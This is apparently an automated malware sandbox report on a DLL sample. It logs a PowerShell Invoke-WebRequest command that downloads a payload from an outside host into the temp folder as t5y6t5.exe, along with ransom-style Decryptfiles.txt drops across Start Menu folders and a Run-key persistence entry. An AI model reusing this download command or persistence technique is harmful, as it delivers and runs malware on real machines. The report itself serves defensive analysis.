Source: R7bv9d6gTH.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: R7bv9d6gTH.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Z:\scvhost\Release\scvhost.pdb source: t5y6t5.exe, 00000013.00000000.2335924756.000000000063C000.00000002.00000001.01000000.00000004.sdmp, t5y6t5.exe, 0000001B.00000000.2475644812.000000000063C000.00000002.00000001.01000000.00000004.sdmp, t5y6t5.exe, 0000001E.00000000.2558250004.000000000063C000.00000002.00000001.01000000.00000004.sdmp, t5y6t5.exe.15.dr
Source: Binary string: Z:\lderd\Release\lderd.pdb source: R7bv9d6gTH.dll
Source: Binary string: Z:\lderd\Release\lderd.pdb source: R7bv9d6gTH.dll
Source: Binary string: Z:\scvhost\Release\scvhost.pdbl source: t5y6t5.exe, 00000013.00000000.2335924756.000000000063C000.00000002.00000001.01000000.00000004.sdmp, t5y6t5.exe, 0000001B.00000000.2475644812.000000000063C000.00000002.00000001.01000000.00000004.sdmp, t5y6t5.exe, 0000001E.00000000.2558250004.000000000063C000.00000002.00000001.01000000.00000004.sdmp, t5y6t5.exe.15.dr
Source: R7bv9d6gTH.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: R7bv9d6gTH.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: R7bv9d6gTH.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: R7bv9d6gTH.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: R7bv9d6gTH.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://fiatie.top/seti/cnost5ty6y.cpl -Outfile $env:tmp\t5y6t5.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\t5y6t5.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Documents and Settings\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XPSUDTARWJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XPSUDTARWJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\SoftwareClient PrivateJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
